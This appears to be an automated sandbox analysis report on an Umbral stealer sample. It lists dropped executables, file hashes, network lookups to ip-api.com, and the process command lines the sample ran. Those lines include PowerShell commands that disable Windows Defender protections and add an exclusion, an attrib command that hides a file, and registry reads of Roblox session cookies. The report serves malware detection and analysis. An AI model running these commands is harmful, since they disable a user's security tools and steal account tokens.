Analysis Overview
SHA256
52770ec8f2e84b3e264870a7533286670e61bff2c8932f0cd6cc1f60af3323ae
Threat Level: Known bad
The file ConsoleApplication1.obf.exe was found to be: Known bad.
Malicious Activity Summary
Detect Umbral payload
Umbral family
Umbral
Drops file in Drivers directory
Reads user/profile data of web browsers
Executes dropped EXE
Looks up external IP address via web service
Drops file in System32 directory
Unsigned PE
Views/modifies file attributes
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-11-05 03:19
Signatures
Detect Umbral payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Umbral family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2023-11-05 03:19
Reported
2023-11-05 03:19
Platform
win10v2004-20231023-en
Max time kernel
7s
Max time network
19s
Command Line
Signatures
Detect Umbral payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Umbral
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\System32\Speech\PFjCYKvY6iOmt1PXsCUkvtRGoBX7DypU.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Speech\aJWTG7XmdTpodQAaYnZxLv6pA5Dqot49.exe | N/A |
| N/A | N/A | C:\Windows\System32\Speech\PFjCYKvY6iOmt1PXsCUkvtRGoBX7DypU.exe | N/A |
Reads user/profile data of web browsers
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\Speech\aJWTG7XmdTpodQAaYnZxLv6pA5Dqot49.exe | C:\Users\Admin\AppData\Local\Temp\ConsoleApplication1.obf.exe | N/A |
| File created | C:\Windows\System32\Speech\PFjCYKvY6iOmt1PXsCUkvtRGoBX7DypU.exe | C:\Users\Admin\AppData\Local\Temp\ConsoleApplication1.obf.exe | N/A |
| File opened for modification | C:\Windows\System32\Speech\PFjCYKvY6iOmt1PXsCUkvtRGoBX7DypU.exe | C:\Windows\SYSTEM32\attrib.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Speech\PFjCYKvY6iOmt1PXsCUkvtRGoBX7DypU.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\ConsoleApplication1.obf.exe
"C:\Users\Admin\AppData\Local\Temp\ConsoleApplication1.obf.exe"
C:\Windows\System32\Speech\aJWTG7XmdTpodQAaYnZxLv6pA5Dqot49.exe
C:\Windows\System32\Speech\aJWTG7XmdTpodQAaYnZxLv6pA5Dqot49.exe
C:\Windows\System32\Speech\PFjCYKvY6iOmt1PXsCUkvtRGoBX7DypU.exe
C:\Windows\System32\Speech\PFjCYKvY6iOmt1PXsCUkvtRGoBX7DypU.exe
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Windows\System32\Speech\PFjCYKvY6iOmt1PXsCUkvtRGoBX7DypU.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Windows\System32\Speech\PFjCYKvY6iOmt1PXsCUkvtRGoBX7DypU.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 163.252.72.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.194.73.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| NL | 142.250.179.131:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | 131.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 39.142.81.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.78.124.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
Files
C:\Windows\System32\Speech\aJWTG7XmdTpodQAaYnZxLv6pA5Dqot49.exe
| MD5 | cebf7458dceffcbb81a290cf045beb27 |
| SHA1 | 98c74fa610995d61d2ee78a2ea888e003e9f436d |
| SHA256 | 97d22321ba783bf6d2119320d38d776bbc6bef42fe3dadecf512e23bbdd29660 |
| SHA512 | 144f0da1e8060e08340f1b349f7bbb17be298ee3d27d056d5603143125b8a9d7abb9485d0f5a2a26e2e50f0d5970ecf5fc3a9e665eece70414c6dc1504b04a91 |
C:\Windows\System32\Speech\PFjCYKvY6iOmt1PXsCUkvtRGoBX7DypU.exe
| MD5 | ef2711e9aeeb23297016ef32b46a3c7e |
| SHA1 | ba51f478c1118d7803620367cb97ce2ceba52a5a |
| SHA256 | 2fe65b8585389b60e44f688f755bbaefe5a3689737050a96c7586bd9b69a9759 |
| SHA512 | 3c5453a308f0f8321141c2949540f7c3a7c9774eb9e8767210ee30e9745caee0e8bafa8806736f1ec04bd952aa411a5a38a6c97fe19bea3d8d86729571a7059f |
C:\Windows\System32\Speech\PFjCYKvY6iOmt1PXsCUkvtRGoBX7DypU.exe
| MD5 | ef2711e9aeeb23297016ef32b46a3c7e |
| SHA1 | ba51f478c1118d7803620367cb97ce2ceba52a5a |
| SHA256 | 2fe65b8585389b60e44f688f755bbaefe5a3689737050a96c7586bd9b69a9759 |
| SHA512 | 3c5453a308f0f8321141c2949540f7c3a7c9774eb9e8767210ee30e9745caee0e8bafa8806736f1ec04bd952aa411a5a38a6c97fe19bea3d8d86729571a7059f |
memory/1232-9-0x000001CAB1DD0000-0x000001CAB1E10000-memory.dmp
memory/1232-10-0x00007FFC8FB10000-0x00007FFC905D1000-memory.dmp
memory/1232-11-0x000001CACC390000-0x000001CACC3A0000-memory.dmp
memory/2328-12-0x00007FFC8FB10000-0x00007FFC905D1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2ys2lioz.dti.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2328-23-0x0000018BE5A90000-0x0000018BE5AA0000-memory.dmp
memory/2328-22-0x0000018BE5A10000-0x0000018BE5A32000-memory.dmp
memory/2328-24-0x0000018BE5A90000-0x0000018BE5AA0000-memory.dmp
memory/2328-25-0x0000018BE5A90000-0x0000018BE5AA0000-memory.dmp
memory/2328-26-0x0000018BE5A90000-0x0000018BE5AA0000-memory.dmp
memory/2328-29-0x00007FFC8FB10000-0x00007FFC905D1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
memory/4192-31-0x00007FFC8FB10000-0x00007FFC905D1000-memory.dmp
memory/4192-41-0x000001CA484F0000-0x000001CA48500000-memory.dmp
memory/4192-42-0x000001CA484F0000-0x000001CA48500000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 2e907f77659a6601fcc408274894da2e |
| SHA1 | 9f5b72abef1cd7145bf37547cdb1b9254b4efe9d |
| SHA256 | 385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233 |
| SHA512 | 34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721 |
memory/4192-44-0x000001CA484F0000-0x000001CA48500000-memory.dmp
memory/1232-45-0x00007FFC8FB10000-0x00007FFC905D1000-memory.dmp
memory/4192-47-0x00007FFC8FB10000-0x00007FFC905D1000-memory.dmp
memory/1232-50-0x000001CACC560000-0x000001CACC5D6000-memory.dmp
memory/1232-51-0x000001CACC4E0000-0x000001CACC530000-memory.dmp
memory/1232-52-0x000001CACC620000-0x000001CACC63E000-memory.dmp
memory/1232-53-0x000001CACC390000-0x000001CACC3A0000-memory.dmp
memory/2840-54-0x00007FFC8FB10000-0x00007FFC905D1000-memory.dmp
memory/2840-55-0x000001FE8A010000-0x000001FE8A020000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a4d919c0b86abb8726889c70aa684ce6 |
| SHA1 | 0c3d34a077526faea0c816b083d6b1594839aac8 |
| SHA256 | b40885d7d80c8b07f2b227cca9848c856257713d908f303390eb3c5b2ee4241a |
| SHA512 | 9af2bab67d210df0e710141123b4dc6e0613e5becdc2e58264d3f81ccad195d4b3f963f6dca71ebda40f26a0d57b9c730183d6b470fac677c8199890417423b9 |
memory/2840-77-0x000001FE8A010000-0x000001FE8A020000-memory.dmp
memory/2840-80-0x00007FFC8FB10000-0x00007FFC905D1000-memory.dmp
memory/2372-90-0x00007FFC8FB10000-0x00007FFC905D1000-memory.dmp
memory/2372-91-0x000002226B020000-0x000002226B030000-memory.dmp
memory/2372-92-0x000002226B020000-0x000002226B030000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | b0a78e60bfb279d18fd3d6e7a67411f5 |
| SHA1 | 9344fe3654a14bc66afb9dc6ea215fabfbe5c906 |
| SHA256 | a28890c82033d3deaf5770ecd1b0239c77321acc93704b1d4b1e167b91e30aeb |
| SHA512 | 9548be23bec645cd705482f78d43b63659e38cf879c34f7071f42fd86ee02039379a5e92fbe0f1c74c12aaebabdd8002f57eba111d3e855cbd0c89a110e346f2 |
memory/2372-94-0x000002226B020000-0x000002226B030000-memory.dmp
memory/2372-96-0x00007FFC8FB10000-0x00007FFC905D1000-memory.dmp
memory/1232-98-0x000001CAB3B80000-0x000001CAB3B8A000-memory.dmp
memory/1232-99-0x000001CACC530000-0x000001CACC542000-memory.dmp
memory/2660-102-0x00007FFC8FB10000-0x00007FFC905D1000-memory.dmp
memory/2660-104-0x000002B86AA00000-0x000002B86AA10000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | b3ae619d7b2e604c5cda175980a9e909 |
| SHA1 | 7fc9e9750d42637f9a663a4e143ccf8666249d02 |
| SHA256 | 64ea1d41f18f3e3a3bef881901858bd8fed54f52d801521f9a3686073683b500 |
| SHA512 | bc72d169b668e759168b08e753591e81bf8fd08a41b7b14522bbc071ebc16548af231ad4a49385df31c690fa456a7b27c1f3554a80acc0a99e877c6717b377e0 |
memory/2660-103-0x000002B86AA00000-0x000002B86AA10000-memory.dmp
memory/2660-115-0x000002B86AA00000-0x000002B86AA10000-memory.dmp